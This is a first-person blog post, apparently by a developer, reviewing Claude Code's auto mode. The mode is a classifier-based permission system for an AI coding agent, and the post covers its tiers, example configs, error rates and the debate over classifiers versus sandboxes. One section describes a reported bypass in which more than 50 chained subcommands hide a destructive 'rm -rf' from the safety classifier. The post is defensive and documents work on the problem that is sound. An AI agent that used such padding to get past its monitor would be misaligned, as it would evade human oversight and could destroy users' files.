I watched Claude delete my staging database config on a Tuesday afternoon. Not maliciously. Not even carelessly. I had asked it to "clean up unused config files," and it did exactly what I asked. The problem was that I had launched it with --dangerously-skip-permissions, so there was no confirmation step. No pause. No "are you sure?" Just a file, gone, and me staring at a terminal realizing I had handed a power tool to an intern with no guardrails.
That was January. By March, Anthropic shipped something that should have existed from day one: claude code auto mode. A middle ground between clicking "approve" on every single file read and letting an AI agent run unsupervised with root-level access to your entire project. The flag that should have scared you more than it did is finally getting a proper replacement.
Here is how it works, what it actually catches, and where it still falls short.
The Permission Problem Nobody Talked About
Before auto mode, Claude Code had two settings. Manual mode, where every tool call required your explicit approval. And --dangerously-skip-permissions, where nothing did.
Manual mode sounds responsible. In practice, it was theater.
Anthropic's own data tells the story: users approve 93% of manual permission prompts. Ninety-three percent. If you approve 93 out of 100 prompts, you are clicking "yes" reflexively. That is not security. That is muscle memory. You are not reading what the tool is about to do. You are not evaluating risk. You are performing a ritual that makes you feel safe while providing almost no actual protection.
I know this because I was one of those users. I would start a session intending to review every action carefully. By the fifteenth file read request, I was hitting Enter without looking. By the thirtieth, I had switched to --dangerously-skip-permissions because at least that was honest about what was happening. No pretense of oversight. Just speed.
The 7% of prompts that users did reject? Those were the ones that mattered. The destructive writes. The unexpected shell commands. The file deletions. But by the time one of those appeared in the stream, your attention was already gone. You had been trained by 93 approvals to stop paying attention.
This is the core insight behind auto mode: the old binary was broken. Not because manual approval is a bad idea in theory, but because humans are terrible at maintaining vigilance through repetitive, low-signal approval flows. We needed something that could distinguish the routine from the dangerous before asking for human input.
What Auto Mode Actually Is
You enable it with claude --enable-auto-mode, or you can cycle through modes with Shift+Tab during a session. It sits between manual and skip-permissions as a third option. The Anthropic engineering blog post describes it as a classifier-based approach, but that undersells the architecture. It is actually a two-layer system with three tiers of permission handling.
Think of it like fly-by-wire in aviation. A pilot flying a modern Airbus does not directly control the flight surfaces. They express intent through a sidestick, and a computer system interprets that intent, applies safety envelopes, and then moves the ailerons and elevators. The pilot can still override. The computer can still refuse a command that would stall the aircraft. Neither is fully in control. Both are necessary.
Auto mode works the same way. You express intent to Claude. Claude generates tool calls. A classifier system evaluates each tool call against safety rules. Low-risk actions proceed automatically. High-risk actions get flagged for your approval. The system is designed so that when it does ask you to approve something, that request carries actual signal. You should pay attention because the filter has already removed the noise.
The Two-Layer Classifier
The safety system has two distinct layers, each solving a different threat.
Layer 1: Input scanning. A server-side scanner examines tool outputs for prompt injection attempts. This is the defense against the scenario where Claude reads a file that contains adversarial instructions designed to hijack the agent's behavior. If you have ever read about indirect prompt injection attacks, this is the layer that addresses them. It runs on every piece of external content that enters Claude's context.
Layer 2: Output classification. This is the more interesting layer. It uses Claude Sonnet 4.6 in a two-stage pipeline. The first stage is a fast yes/no filter. Most tool calls pass through in milliseconds. If the first stage flags something, the second stage performs chain-of-thought reasoning to determine whether the action is genuinely dangerous or a false positive.
The two-stage design matters for performance. Running full chain-of-thought analysis on every single tool call would make auto mode slower than manual approval. The fast filter handles the 85-90% of calls that are obviously safe (file reads, searches, non-destructive operations), and the expensive reasoning only fires when something looks risky.
Three Tiers of Permissions
The permission system itself has three tiers, each with different trust levels.
Tier 1: Built-in allowlist plus user configuration. Read operations, file searches, and other non-destructive actions are pre-approved. You can also configure your own patterns for actions you always want to allow. If you have a test command that you run hundreds of times a day, you can add it to the allowlist so the classifier never bothers you about it.
Tier 2: In-project file operations. Writing, creating, and modifying files within your project directory are allowed without classifier review. The assumption is that if Claude is editing files inside the project you pointed it at, that is probably what you asked it to do. This is the tier that eliminates most of the 93% noise. File writes are the most common tool call, and they are almost always intentional.
Tier 3: Transcript classifier for high-risk actions. Shell commands, file operations outside the project directory, network requests, and anything else that could affect your broader system goes through the full classifier pipeline. This is where the chain-of-thought reasoning kicks in. This is where auto mode earns its keep.
You can inspect the full default ruleset by running claude auto-mode defaults, which dumps the JSON configuration. I recommend doing this before you enable auto mode for the first time. Know what you are trusting.
Setting It Up: A Practical Walkthrough
Getting started with auto mode takes about two minutes, but configuring it well takes longer. Here is what I recommend.
Step 1: Enable and Inspect
# Enable auto mode
claude --enable-auto-mode
# Check the default rules
claude auto-mode defaultsThe defaults output is a JSON document that lists every rule the classifier uses. Read through it once. Pay attention to which shell commands are in the allowlist and which are not.
Step 2: Understand the Mode Cycling
During any Claude Code session, you can press Shift+Tab to cycle between three modes:
- Manual - Every tool call requires approval (the old default)
- Auto - Classifier-based approval (the new middle ground)
- Skip - No approval required (the old
--dangerously-skip-permissions)
You can switch modes mid-session. This is genuinely useful. Start in auto mode for general work, switch to manual if you are about to do something sensitive, switch back when you are done. The flexibility matters more than the default.
Step 3: Configure Your Allowlist
If you have project-specific commands that you run constantly, add them to your allowlist. For a typical Node.js project, that might look like:
{
"allowedCommands": [
"npm test",
"npm run lint",
"npm run build",
"npx tsc --noEmit"
]
}This reduces classifier overhead for commands you know are safe. If you are working on a project with a specific test runner or build tool, add those too. The goal is to minimize false positives for your workflow.
For a deeper dive on configuring Claude Code for your projects, check out our 50 Claude Code tips and tricks. Many of the permission and configuration patterns discussed there apply directly to auto mode setup.
Step 4: Test with a Dry Run
Before trusting auto mode on a real project, test it on a throwaway directory. Ask Claude to do things that should be flagged: delete files outside the project, run curl commands, modify system configs. Verify that the classifier catches them. Then ask it to do normal development work and verify that the flow is smooth.
This is not paranoia. This is the equivalent of checking your rearview mirrors before pulling out of a parking spot. You do it once, you build confidence, and then you drive normally.
The Classifier vs. Sandbox Debate
Here is where I want to be honest about something. Auto mode is a real improvement. It is also a genuinely controversial architectural choice, and the criticism it has received is not unfounded.
Simon Willison, whose writing on AI security I respect enormously, raised the core objection within hours of the launch. His argument is straightforward: a classifier is non-deterministic by nature. It uses a language model to evaluate safety, and language models are probabilistic systems. Sometimes they will miss things. Sometimes they will flag things incorrectly. You cannot write a formal proof that a classifier will catch every dangerous command, because the classifier itself is a neural network making judgment calls.
His preferred alternative is deterministic sandboxing. Run the AI agent inside a container. Give the container access only to the project directory and a limited set of system calls. No classifier needed because the sandbox cannot perform dangerous actions, regardless of what the model tries to do. The security boundary is enforced by the operating system, not by another AI model.
This is a compelling argument, and I am not sure Willison is wrong.
But here is the counterargument. Sandboxing solves a different problem than the one most developers actually face. A sandbox prevents catastrophic system-level damage. It does not prevent the AI from making bad decisions within the project. It does not stop Claude from rewriting your authentication logic with a known vulnerability. It does not prevent it from adding a dependency with a supply chain attack embedded in it. The classifier, at least in theory, can reason about intent in a way that a sandbox boundary cannot.
The real answer is probably both. Sandboxing for system-level containment, classification for project-level judgment. Auto mode gives you the classifier half. For the sandbox half, you are still on your own, though running Claude Code inside a Docker container is not particularly difficult.
I genuinely do not know which approach will win in the long run. The classifier approach is more flexible and more useful for day-to-day development. The sandbox approach is more formally secure and more resistant to adversarial attacks. If you are building something where security is existential, like handling financial data or medical records, I would use both. If you are building a side project, auto mode alone is a massive improvement over what came before.
The Supply Chain Blind Spot
There is one area where auto mode's defaults genuinely concern me, and I want to flag it clearly.
The default rules allow pip install and npm install without classifier review.
Let that sink in. The system that exists to protect you from dangerous commands considers package installation a safe operation. It is not. Package installation is one of the most significant attack vectors in modern software development. Typosquatting attacks, dependency confusion, malicious postinstall scripts: these are not theoretical threats. They happen constantly.
When Claude decides it needs a package to solve your problem, it will install it. In auto mode, that installation will proceed without your approval. If the package name is slightly misspelled, or if someone has published a malicious package with a similar name, you will not get a chance to intervene.
This is fixable. You can add npm install and pip install to your blocked commands list, forcing classifier review. I strongly recommend doing this:
{
"blockedCommands": [
"npm install *",
"pip install *",
"yarn add *",
"pnpm add *"
]
}We wrote extensively about the broader security landscape of AI-assisted coding in our vibe coding security rules guide. The supply chain section is directly relevant here. Auto mode does not solve supply chain security. You still need lockfiles, you still need audit tools, and you still need to review what gets installed.
The Adversa AI Bypass (and What It Revealed)
In early April, security firm Adversa AI discovered a bypass in the classifier pipeline. When a single tool call contained more than 50 subcommands piped together, the classifier would fall back to a simplified evaluation mode that missed dangerous operations buried in the chain. A carefully crafted command like echo "harmless" && echo "still harmless" && ... (48 more) && rm -rf /important/directory could slip through.
Anthropic fixed this in version 2.1.90 by imposing a hard limit on command complexity and decomposing piped chains into individual evaluations. But the vulnerability revealed something important about the classifier approach: its failure modes are surprising. A sandbox fails predictably. You try to access something outside the sandbox, you get a permission denied error. A classifier fails in ways that require adversarial creativity to discover.
This is not a reason to avoid auto mode. Every security system has failure modes. But it is a reason to treat auto mode as one layer in a defense-in-depth strategy, not as your entire security posture. If you are working on a project where an agent could cause real damage, read our guide on blocking AI agents from merging PRs. The principle is the same: give the agent enough power to be useful, but keep critical operations behind human gates.
The Numbers: What the Classifier Actually Catches
Let me share the performance data Anthropic published, because it tells an interesting story.
The full pipeline false positive rate is 0.4%. That means for every 1,000 safe tool calls, only 4 will be incorrectly flagged for human review. This is excellent. It means auto mode will almost never interrupt you unnecessarily. When it asks for approval, you should take it seriously because it is almost certainly flagging something worth looking at.
The false negative rate on what Anthropic calls "overeager" commands is 17%. This means roughly 1 in 6 commands that the classifier should flag will slip through without human review. These are commands that are not catastrophically dangerous but are more aggressive than what the user probably intended. Think git push --force when you meant git push, or rm -r on a directory you expected to only partially clean.
Seventeen percent sounds alarming until you compare it to the alternative. With --dangerously-skip-permissions, the false negative rate is 100%. Everything slips through. With manual mode, the false negative rate depends entirely on your attention span, and we have already established that 93% of the time you are not paying attention.
Is 0.4% false positives and 17% false negatives good enough? For most development work, yes. For security-critical operations, probably not. This is the kind of judgment call that auto mode forces you to make explicitly, which is itself an improvement over the old binary.
The Team-Only Problem
There is one more thing worth discussing, and it is not technical. It is organizational.
Auto mode is currently available only on Team plans. It requires admin approval to enable. Enterprise and API access are coming but not here yet.
This creates a two-tier safety system. Teams that pay for the premium plan get the classifier. Individual developers, open source contributors, and hobbyists get the old binary: manual approval or skip permissions. The people who are most likely to use --dangerously-skip-permissions because they cannot afford to click through hundreds of approval prompts are the ones who do not get access to the safer middle ground.
I understand why Anthropic made this choice. The classifier has real compute costs, running Sonnet 4.6 on every tool call is not free. The Team plan pricing covers that cost. And requiring admin approval means organizations can make deliberate decisions about how much autonomy their developers give to AI agents.
But the effect is that the safety improvement is gated behind a paywall. Solo developers are stuck with the same broken binary they had before. I hope Anthropic finds a way to bring at least a basic version of auto mode to individual users. The 93% approval rate is not a Team-plan problem. It is a human problem.
My Setup After Two Weeks
I have been running auto mode on my primary projects for about two weeks now. Here is what my configuration looks like and what I have learned.
I keep auto mode as my default but switch to manual for three specific scenarios: database migrations, deployment scripts, and anything touching authentication logic. The classifier is good, but these are areas where I want to read every command myself. The cost of a mistake is too high.
I have added npm install, pip install, and all package manager variants to my blocked commands list. Every package installation gets my explicit review. This has caught two cases where Claude suggested installing packages I had never heard of. Both turned out to be legitimate, but the review step gave me confidence.
I run Claude Code inside a Docker container for projects that touch production data. This gives me the sandbox layer that auto mode does not provide. The combination of classifier plus sandbox covers both the project-level judgment and the system-level containment.
I have auto mode defaults saved in my project's .claude/ directory so every team member gets the same configuration. Consistency matters when you are sharing an AI agent across a team.
The biggest change is psychological. In manual mode, I had trained myself to ignore approval prompts. In auto mode, when the classifier flags something, I actually read it. The signal-to-noise ratio is high enough that approval requests feel meaningful instead of tedious. That alone might be the most important improvement.
Configuring Auto Mode for Your Workflow
Here is a reference configuration that balances productivity with security. Adjust it to your needs.
{
"autoMode": {
"enabled": true,
"allowedCommands": [
"npm test",
"npm run lint",
"npm run build",
"npm run dev",
"npx tsc --noEmit",
"git status",
"git diff",
"git log"
],
"blockedCommands": [
"npm install *",
"pip install *",
"yarn add *",
"pnpm add *",
"rm -rf *",
"git push --force*",
"chmod 777 *"
],
"alwaysReviewPatterns": [
"*.env*",
"docker-compose*.yml",
"Dockerfile*",
"**/migrations/**"
]
}
}The alwaysReviewPatterns field is particularly useful. Any file matching these patterns will trigger classifier review even for Tier 2 in-project operations. I use it for environment files, Docker configs, and database migrations. These are files where a well-intentioned edit can still cause serious problems.
What Comes Next
Auto mode is version one of something that will evolve significantly. The classifier will get better. The false negative rate will drop. New tiers of permission handling will appear. Anthropic has hinted at project-specific safety profiles that learn from your approval history, essentially a classifier that adapts to your risk tolerance over time.
The more interesting question is whether other AI coding tools will adopt similar approaches. Right now, most competitors offer the same binary that Claude Code used to have: approve everything or approve nothing. If auto mode proves successful, and the early data suggests it will, I expect we will see classifier-based permission systems become standard across the industry.
The broader pattern here matters more than the specific implementation. We are moving from a world where AI agent safety was binary, either fully trusted or fully supervised, to a world where safety is graduated. Different actions carry different risk levels. Different contexts require different amounts of human oversight. The system should be smart enough to tell the difference.
That is what auto mode attempts. It does not attempt it perfectly. The supply chain blind spot is real. The team-only restriction is frustrating. The classifier-vs-sandbox debate is genuinely unresolved. Simon Willison might be right that deterministic boundaries are fundamentally more trustworthy than probabilistic classifiers.
But here is what I keep coming back to. The old system was not working. We know it was not working because 93% of the time, we were not using it. Auto mode is an honest attempt to build something that humans will actually use correctly, rather than something that is theoretically secure but practically ignored.
I will take an imperfect system that people actually engage with over a perfect system that everyone bypasses. That is not a security argument. That is a human nature argument. And in security, human nature always wins eventually.
If you are still running --dangerously-skip-permissions, switch to auto mode today. If you are still clicking through manual approvals on autopilot, switch to auto mode today. And if you are on auto mode already, go inspect your defaults, block your package managers, and treat the classifier as one layer in a stack, not the whole stack.
The conversation about how much autonomy we give AI agents is just getting started. Auto mode is not the final answer. But it is the first honest answer.